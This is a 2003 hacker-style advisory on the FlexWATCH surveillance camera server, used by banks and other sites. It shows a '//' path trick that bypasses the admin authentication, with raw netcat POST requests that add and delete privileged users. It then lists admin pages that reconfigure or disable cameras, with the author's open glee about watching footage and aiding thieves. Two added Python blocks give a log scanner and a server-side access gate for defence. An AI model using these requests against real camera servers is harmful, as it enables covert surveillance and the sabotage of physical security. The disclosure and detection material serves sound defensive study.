The FlexWATCH surveillance camera server is used by many banks and "secure" places and contains remotely exploitable vulnerabilities which allow remote attackers to view camera footage, add users, remove users, change the configuration, disable camera surveillance, and more.
------------------ u0xa ------------------------
Author: SLAIZER
mail: slaizer[at]phreaker.net
Date: Sun/Oct/26/2003
-------"Another way of seeing the things"--------
-------------------------------------------------
Unauthorized access Vulnerability in FlexWATCH camera Server.
-----------------------------------------------------------
Vendor:
-------
·SEYEON Technology
·FlexWATCH Network Video Server
Url: https://www.flexwatch.com/
Mail: sytech@seyeon.co.kr
Product:
--------
All versions of the web-based configuration utility.
I tested on SYS_MODEL = 132
FlexWATCH is a camera server used to centralize camera administration over the web.
It's very frequently used by security companies, banks, parks and commercial centres.
Description :
-------------
[Necora@eviluser]$ echo -e "HEAD / HTTP/1.0\n\n" | nc victim 80
HTTP/1.0 302 Redirect
Server: FlexWATCH-Webs <--- :)
Date: Sun Oct 26 02:15:07 2003
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Location: https://victim/index.htm
Age: 0
*First:
By default, you can read the source of the index page and see this:
<!-- You can modify here for user information. -->
<!-- ex) ID:guest, PASSWORD:guest -->
Many systems use this user and password, but that isn't important.
I found this:
------------u0xa-----------
}
function adminTool(){ window.open("admin/aindex.htm","aindex","width=790,height=430,status=yes,resizable"); }
function select_sample()
------------u0xa-----------
<This is authentication done in JavaScript>
The URL admin/aindex.htm is the web-based configuration.
*I read more page sources, and saw:
-----------u0xa------------
<APPLET mayscript width=352 height=260 archive="stream.jar" codebase='/app/applet' code=StreamApplet.class name=StreamApplet>
-----------u0xa------------
ummMm I want to read stream.jar :
[Necora@eviluser]$ jar xf stream.jar
-
META-INF/
META-INF/MANIFEST.MF
PrintfFormat$ConversionSpecification.class
CMsg.class
FInfo.class
StreamApplet.class
ImgCan.class
IMsg.class
JHCompr.class
JHEncry.class
JHManda.class
JHStand.class
LoginDlg.class <---- (C:
MIMEBase64.class <--- old friend :)
CgiQueryInfo.class
PrintfFormat.class
QueryMng.class
Semaphore.class
SingleCgi.class <----- For now any cgi-url
StrCan.class
StreamCgi.class <----- For now any cgi-url
StreamSocket.class
StreamThread.class
TCBack.class
Timer.class
-
·It's enough to know how the system works: authorization, cgi, crypt..
---------------------------
*Second, look at https://victim/live.html
and find this:
------------u0xa------------
<script language = "JavaScript" src="sysinfo.js"></script>
------------u0xa------------
This contains information about the system:
//-- Model Information
SYS_MODEL = 132;
KERNEL_MAJORVER = 2;
KERNEL_MINORVER = 2;
IS_OEM = 0;
MODEL_NAME = "FLEXWATCH";
//-- For Administration
IS_ISDN = 0;
IS_LEASED = 1;
IS_AUDIO = 1;
IS_RTC = 1;
IS_RTC = "SAMSUNG";
//-- For Application
COUNT_CAM = 6;
COUNT_DI = 6;
COUNT_DO = 6;
VIDEO_FORMAT = 2;
TOTAL_FORMAT = 0x0007;
IS_PTZ = 1;
var CAM_NAME = new Array (6);
CAM_NAME[1] = "Office1";
CAM_NAME[2] = "Office2";
CAM_NAME[3] = "Office3";
CAM_NAME[4] = "4";
CAM_NAME[5] = "5";
CAM_NAME[6] = "6";
var PTZ_INSTALL = new Array (6);
PTZ_INSTALL[1] = 51;
PTZ_INSTALL[2] = 51;
PTZ_INSTALL[3] = 0;
PTZ_INSTALL[4] = 51;
PTZ_INSTALL[5] = 0;
PTZ_INSTALL[6] = 0;
-----------------------
*Some time ago, I read about a security vulnerability in Boa: how to obtain access to a privileged directory with '//'
Example :
https://victim//privileged.html <--- ok?
*The camera access URL:
------------------------
https://victim//app/sample/ab1.html
Wow! First access granted! Now you have to identify yourself in the Java application.
But... why search any further there, if we can play with the administration web site? Let's try
https://victim//admin/aindex.htm <---- Interesting....
Now it's very easy :D ,
·Add a user to view cameras:
------------------------------
https://victim//admin/asp/adduser.asp <---- Form <form action=/goform/AddUser method=POST>
[Necora@eviluser]$ nc victim 80
POST /goform/AddUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://victim//admin/asp/adduser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 152
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&password=root123&passconf=root123&group=POWER_USER&enabled=on&ok=OK
\n\n
**********************************************************************
-Wow! New user added : user= slaizer password= root123 group=POWER_USER*
**********************************************************************
*Note: There are different groups for an added user: guest, User and Power_User.
By default only the guest group can access remotely; you change this in:
https://victim//admin/asp/chglimit.asp
·How to delete a user:
------------------
https://victim//admin/asp/deluser.asp
[Necora@eviluser]$ nc victim 80
POST /goform/DeleteUser HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: https://victim//admin/asp/deluser.asp
Accept-Language: es
Content-Type: application/x-www-form-urlencoded
Connection: Close
User-Agent: Epi and Blass 1.0 (compatible; Cuartango 3.0)
Host: victim
Content-Length: 90
Pragma: no-cache
RetPage=%2Fadmin%2Fretok2.htm&SaveCfg=YES&ClsPage=%2Fadmin%2Fclose1.htm&user=slaizer&ok=OK
\n\n
**********************
-User slaizer deleted*
**********************
------------------------------------------------|
Now you have access to watch all cameras :-D ! |
You can also reboot, edit the configuration ... |
|
|
https://victim/app/sample/ab1.html |
|
-Login=slaizer password=root123- |
________________________________________________|
Examples :
·Configure the e-mail address the config is sent to:
https://victim//admin/fset/fset_email.htm
·Configure FTP to send an "evil-config" trojan-cgi/asp conf .. blah blah.
https://victim//admin/fset/fset_ftp.htm
·Edit modem configuration for phreakers :)
https://victim//admin/fset/fset_modem.htm
·Change camera names xD Camera1=xD Camera2=rules! Camera3=AznarSucks!
https://victim//admin/aindex.htm
<Imagination , coffee and time.>
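A defender-side check for the requests shown above, as an added example that is not part of the original advisory: it scans web-server or proxy logs for request targets and Referer values that reach the advisory's /admin, /goform and /app/sample paths through a non-canonical spelling such as '//'. The Combined Log Format, the protected-prefix list and the sample entries are assumptions constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Protected trees, taken from the URLs in this advisory (adjust per device).
PROTECTED = ("/admin", "/goform", "/app/sample")
# Combined Log Format: client, request line, status, size, referer.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+) [^"]*" (\d{3}) \S+ "([^"]*)"')

def raw_path(url):
    """Path as sent: drop scheme://host and the query, keep every slash.
    urlsplit() is avoided because it parses '//admin/x' as host 'admin'."""
    return re.sub(r"^[a-zA-Z][a-zA-Z0-9+.-]*://[^/]*", "", url).split("?", 1)[0]

def canonical(path):
    """Decoded path with repeated slashes and dot segments resolved."""
    decoded = unquote(path)
    canon = posixpath.normpath(re.sub(r"/{2,}", "/", decoded))
    return canon + "/" if decoded.endswith("/") and canon != "/" else canon

def evades_acl(url):
    """True when a non-canonical spelling resolves inside a protected tree."""
    path = raw_path(url)
    canon = canonical(path)
    hit = any(canon == p or canon.startswith(p + "/") for p in PROTECTED)
    return hit and path != canon

def scan(lines):
    """Return (client, field, value, status) for each suspicious log field."""
    findings = []
    for m in filter(None, map(LINE.match, lines)):
        client, target, status, referer = m.groups()
        for field, value in (("target", target), ("referer", referer)):
            if evades_acl(value):
                findings.append((client, field, value, int(status)))
    return findings

# Constructed sample entries, not captured from a real device.
SAMPLE = [
    '192.0.2.10 - - [26/Oct/2003:02:15:07 +0000] "GET /index.htm HTTP/1.0" 200 5120 "-" "test"',
    '192.0.2.10 - - [26/Oct/2003:02:16:40 +0000] "GET //admin/aindex.htm HTTP/1.0" 200 2210 "-" "test"',
    '192.0.2.10 - - [26/Oct/2003:02:17:02 +0000] "POST /goform/AddUser HTTP/1.0" 200 310 "https://victim//admin/asp/adduser.asp" "test"',
    '198.51.100.7 - - [26/Oct/2003:02:20:00 +0000] "GET /admin/aindex.htm HTTP/1.0" 401 0 "-" "test"',
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

The Referer match is a secondary signal only, since a hand-built request can omit or change that header; a 2xx status on a flagged target is the entry to triage first.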
Possible solutions :
--------------------
·Enable the firewall to admit connections only from the clients we want.
·Do not trust authentication done on the client side (JavaScript..)
·SEYEON should invest in security ... a thief might use this to deactivate the cameras during a theft ...
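What the server-side part of these fixes can look like, as an added example that is not vendor code or part of the original advisory: a gate that refuses ambiguous request targets and decides access from the server's own session role, next to a prefix check on the raw path. The raw-prefix check is an assumed model of the '//' flaw, and the ACL table, role names and function names are hypothetical.

```python
from urllib.parse import unquote

# Hypothetical policy: minimum role per tree, using paths named in this advisory.
ACL = {"/admin": "admin", "/goform": "admin", "/app/sample": "guest"}
RANK = {None: 0, "guest": 1, "admin": 2}

def naive_allows(path, role):
    """Assumed model of the flaw: the ACL is matched against the raw path text."""
    for prefix, need in ACL.items():
        if path.startswith(prefix + "/"):
            return RANK[role] >= RANK[need]
    return True  # no protected prefix matched, so the file is served

def strict_status(target, role):
    """Server-side gate: HTTP status for a request target and session role.
    `role` comes from the server's session store, never from the client."""
    path = unquote(target.split("?", 1)[0])
    segments = path.split("/")[1:]
    # Refuse ambiguous spellings instead of guessing what they resolve to.
    if (not path.startswith("/") or "\x00" in path
            or any(s in ("", ".", "..") for s in segments[:-1])
            or segments[-1] in (".", "..")):
        return 400
    for prefix, need in ACL.items():
        if path == prefix or path.startswith(prefix + "/"):
            if RANK[role] >= RANK[need]:
                return 200
            return 401 if role is None else 403
    return 200  # public page

if __name__ == "__main__":
    for target in ("/admin/aindex.htm", "//admin/aindex.htm", "/goform/AddUser"):
        print(target, naive_allows(target, None), strict_status(target, None))
```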
************************
Greetz! :
:: gyorgyo :: overpower :: IsAhT :: phiber :: IaM :: zapper :: dreyer :: kanutron :: Makensi
:: TaYoKeN :: plAnadeCu :: AzTaGo :: gordenai ::
For aLL :
#boinasnegras #ngsec #drakulines #rmosc \\ Irc-Hispano \\
************************
*******************************
*Sorry for orthographic errors*
*******************************